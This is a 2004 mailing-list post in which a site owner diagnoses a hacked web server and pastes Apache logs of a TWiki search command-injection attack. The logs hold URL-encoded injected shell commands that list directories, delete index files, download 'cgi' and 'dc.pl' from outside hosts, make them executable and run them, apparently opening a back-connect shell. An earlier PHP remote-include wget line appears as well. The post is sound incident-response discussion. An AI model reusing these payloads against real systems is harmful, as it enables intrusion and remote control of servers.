My website was hacked! (fwd)
David Kramer
david at thekramers.net
Wed Nov 24 23:48:13 EST 2004
On Wed, 24 Nov 2004, Steve Seremeth wrote:
> David Kramer wrote:
>
> >Anything else I should try?
> >
> >Should I panic more than I am? Right now I feel strongly this was a
> >benign "stupid Apache tricks" thing, and I need to find the hole and close
> >it, but no need to nuke the server and start over.
> >
> >
> >
> To add to my off-list comments...
>
> I'm a little hazy on the details as this was a while ago, but here's
> what we found after the hacker had exploited a _known_ gaping hole in a
> php app one of our users was running:
> * They had dropped a false shell into /var/tmp that ran under the apache
> user -- I think it listened on some funny port - and we discovered it
> when we went to bounce apache and got some weird message
> * They tried to compile an irc bot (go figure)
> * Apache logs had the evidence:
> Several instances of this:
> ./log/access_log:203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET
> /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx
> HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
> DigExt)"
>
> Nasty.
>
> I ran chkrootkit and it didn't find anything. I also did checksums
> against a lot of local binaries compared to known good ones to make sure
> they were the originals.
>
> I bet you are right that it's an apache-only thing, but I would be
> _really_ sure. I would also leave apache (and perhaps other daemons as
> well) down until you are sure you found the problem. Our offender came
> back once or twice more unsuccessfully.
I think I found it. I'm running TWiki, and at that time there were some
really nasty things happening in access_log and error_log.
Access_log:
200.175.37.89 - - [23/Nov/2004:22:59:19 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3B+id%3Bpwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29\
%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 5067
66.196.91.123 - - [23/Nov/2004:22:59:55 -0500] "GET
/docs/php/functions.html HTTP/1.0" 304 -
200.175.37.89 - - [23/Nov/2004:22:59:57 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bls%29+%7C+sed+%27s%2F%5C%28.*\
%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 20131
200.175.37.89 - - [23/Nov/2004:23:00:31 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+htdocs%3Bls%29+%7C+sed+%27\
s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 58706
65.54.188.63 - - [23/Nov/2004:23:00:44 -0500] "GET
/phpdemo/manual/function.asort.html HTTP/1.0" 200 3905
200.175.37.89 - - [23/Nov/2004:23:00:56 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+htdocs%3Brm+-rf+*index*%3B\
ls+*index*%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 3058
200.175.37.89 - - [23/Nov/2004:23:01:48 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+www.gigachat.net%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 305\
9
66.196.90.228 - - [23/Nov/2004:23:02:13 -0500] "GET /robots.txt HTTP/1.0"
404 282
65.54.188.63 - - [23/Nov/2004:23:02:29 -0500] "GET
/phpdemo/manual/function.xmldoc.html HTTP/1.0" 200 2314
66.196.90.245 - - [23/Nov/2004:23:02:59 -0500] "GET
/twiki/bin/view/TWiki/TWikiMetaData HTTP/1.0" 200 18571
65.54.188.63 - - [23/Nov/2004:23:04:05 -0500] "GET
/phpdemo/manual/function.rewinddir.html HTTP/1.0" 200 2208
200.212.114.3 - - [23/Nov/2004:23:04:40 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 3051
200.212.114.3 - - [23/Nov/2004:23:05:02 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bpwd%\
7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 3013
200.212.114.3 - - [23/Nov/2004:23:05:47 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bpwd%\
29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 3570
65.54.188.63 - - [23/Nov/2004:23:05:55 -0500] "GET
/phpdemo/manual/function.mssql-close.html HTTP/1.0" 200 3033
66.196.91.132 - - [23/Nov/2004:23:05:57 -0500] "GET
/phpdemo/manual/function.cpdf-show-xy.html HTTP/1.0" 304 -
200.212.114.3 - - [23/Nov/2004:23:06:17 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+bandits.webm.ru%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 \
3750
200.212.114.3 - - [23/Nov/2004:23:07:21 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1" 200 4868
66.196.90.105 - - [23/Nov/2004:23:07:28 -0500] "GET
/docs/php/function.mcve-ub.html HTTP/1.0" 304 -
65.54.188.63 - - [23/Nov/2004:23:07:29 -0500] "GET
/phpdemo/manual/function.sem-acquire.html HTTP/1.0" 200 2871
66.26.157.9 - - [23/Nov/2004:23:07:33 -0500] "GET /phpdemo/phpvscgi.html
HTTP/1.1" 200 4109
200.212.114.3 - - [23/Nov/2004:23:07:47 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl+200.193.15.61+4%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2
HTTP/1.1"\
200 7178
200.212.114.3 - - [23/Nov/2004:23:08:11 -0500] "GET
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28pwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1_\
_END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3593
65.
error_log:
[Tue Nov 23 20:18:13 2004] statistics: Use of uninitialized value in
concatenation (.) or string at ../lib/TWiki.pm line 528.
.
.
.
[Tue Nov 23 22:08:46 2004] [error] PHP Warning: main(/top.inc) [<a
href='http://thekramers.net/docs/php/function.main.html'>function.main.html</a>]:
failed to open stream: No such file or directory in /srv/www/htdocs/tmp/20010708/index.phtml
on line 5
[Tue Nov 23 22:08:46 2004] [error] PHP Fatal error: main() [<a
href='http://thekramers.net/docs/php/function.require.html'>function.require.html</a>]:
Failed opening req\
uired '/top.inc' (include_path='.:/usr/share/php') in
/srv/www/htdocs/tmp/20010708/index.phtml on line 5
[Tue Nov 23 22:34:11 2004] [notice] cannot use a full or relative URL in a
401 ErrorDocument directive --- ignoring!
.
.
.
[Tue Nov 23 23:02:13 2004] [error] [client 66.196.90.228] File does not
exist: /srv/www/twiki/robots.txt
[Tue Nov 23 23:02:58 2004] [notice] cannot use a full or relative URL in a
401 ErrorDocument directive --- ignoring!
[Tue Nov 23 23:04:39 2004] [notice] cannot use a full or relative URL in a
401 ErrorDocument directive --- ignoring!
sh: -c: line 2: syntax error: unexpected end of file
[Tue Nov 23 23:05:02 2004] [notice] cannot use a full or relative URL in a
401 ErrorDocument directive --- ignoring!
sh: -c: line 2: syntax error: unexpected end of file
[Tue Nov 23 23:05:46 2004] [notice] cannot use a full or relative URL in a
401 ErrorDocument directive --- ignoring!
[Tue Nov 23 23:06:14 2004] [notice] cannot use a full or relative URL in a
401 ErrorDocument directive --- ignoring!
--23:06:15-- http://bandits.webm.ru/xpl/cgi
=> `cgi'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,032 [text/plain]
0K .......... ...... 100% 37.46
KB/s
23:06:16 (37.46 KB/s) - `cgi' saved [17032/17032]
[Tue Nov 23 23:07:20 2004] [notice] cannot use a full or relative URL in a
401 ErrorDocument directive --- ignoring!
--23:07:20-- http://bandits.webm.ru/xpl/dc.pl
=> `dc.pl'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [text/plain]
0K 100% 711.91
KB/s
23:07:21 (711.91 KB/s) - `dc.pl' saved [729/729]
[Tue Nov 23 23:07:45 2004] [notice] cannot use a full or relative URL in a
401 ErrorDocument directive --- ignoring!
--23:07:46-- http://bandits.webm.ru/xpl/dc.pl
=> `dc.pl.1'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [text/plain]
0K 100% 711.91
KB/s
23:07:46 (711.91 KB/s) - `dc.pl.1' saved [729/729]
I will also note that the "bandits.webm.ru" website contains one phrase,
in Russian: "Soon it will begin..."
I'm going to disable TWiki for now.
---------------------------------------------------------------------------
DDDD David Kramer Partner, Agile Rules
http://www.agilerules.com
DK KD 162 Marett Road Lexington, MA 02421 davidk at agilerules.com
DKK D
DK KD Specializing in coaching and development in Agile/XP practices
DDDD and embedded software development
More information about the Discuss
mailing list